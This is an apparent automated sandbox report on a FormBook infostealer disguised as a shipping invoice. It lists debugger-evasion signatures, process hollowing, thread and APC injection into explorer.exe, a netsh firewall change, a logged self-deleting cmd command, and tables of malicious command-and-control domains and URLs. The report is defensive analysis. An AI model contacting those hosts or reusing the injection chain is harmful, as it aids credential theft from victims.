Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h]	9_2_037846A7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h]	9_2_0379FE87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]	9_2_0372C577
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]	9_2_0372C577
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h]	9_2_03727D50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h]	9_2_03743D43
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03783540 mov eax, dword ptr fs:[00000030h]	9_2_03783540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h]	9_2_037B3D40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h]	9_2_0370AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h]	9_2_037CE539
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]	9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]	9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]	9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h]	9_2_037D8D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h]	9_2_0378A537
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h]	9_2_037B8DF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]	9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]	9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]	9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]	9_2_037D05AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]	9_2_037D05AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h]	9_2_037335A1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]	9_2_0373FD9B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]	9_2_0373FD9B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372746D mov eax, dword ptr fs:[00000030h]	9_2_0372746D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]	9_2_0379C450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]	9_2_0379C450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A44B mov eax, dword ptr fs:[00000030h]	9_2_0373A44B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373BC2C mov eax, dword ptr fs:[00000030h]	9_2_0373BC2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]	9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]	9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]	9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C14FB mov eax, dword ptr fs:[00000030h]	9_2_037C14FB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]	9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]	9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]	9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8CD6 mov eax, dword ptr fs:[00000030h]	9_2_037D8CD6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371849B mov eax, dword ptr fs:[00000030h]	9_2_0371849B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10002EDC GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,

1_2_10002EDC

Enables debug privileges

Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_10004CBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_10002ECD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_10007786

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 75.126.100.11 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.215.210.10 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 165.227.229.15 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.88.85.105 80	Jump to behavior

Hijacks the control flow in another process

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165050 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771650F0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165180 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165190 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771651A0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7717FEE0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771133C0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77114760 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770D6590 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770DB510 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770FC490 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EE00 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EFD0 value: E9	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\cmd.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10008C6C cpuid

1_2_10008C6C

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

1_2_10008A23

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_10004896

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

0_2_004033A9

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Source: unknown

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.0.78.24	unknown	United States	2635	AUTOMATTICUS	true
95.215.210.10	unknown	Russian Federation	49055	NEWIT-ASRU	true
165.227.229.15	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
23.88.85.105	unknown	United States	18978	ENZUINC-US	true
75.126.100.11	unknown	United States	36351	SOFTLAYERUS	true

Contacted Domains

Name	IP	Active
www.wtmailer15.com	75.126.100.11	true
gettingthehelloutofca.com	34.102.136.180	true
carnesveymacr.com	192.0.78.24	true
hvcharging.com	34.102.136.180	true
mehler.photography	192.0.78.24	true
caelaabadie.com	165.227.229.15	true
thelonerangernews.com	34.102.136.180	true
wastie.club	95.215.210.10	true
www.mapnimbis.com	45.33.2.79	true
jddq888.com	23.88.85.105	true
www.caelaabadie.com	unknown	unknown
www.uyieoamejus2zd.com	unknown	unknown
www.wastie.club	unknown	unknown
www.mehler.photography	unknown	unknown
www.jddq888.com	unknown	unknown
www.carnesveymacr.com	unknown	unknown
www.thelonerangernews.com	unknown	unknown
www.gettingthehelloutofca.com	unknown	unknown
www.hvcharging.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.jddq888.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176	true	Avira URL Cloud: safe	unknown
http://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS	true	Avira URL Cloud: safe	unknown
http://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0	true	Avira URL Cloud: safe	unknown
http://www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly	true	Avira URL Cloud: safe	unknown
http://www.caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a	true	Avira URL Cloud: safe	unknown
http://www.thelonerangernews.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG	true	Avira URL Cloud: safe	unknown
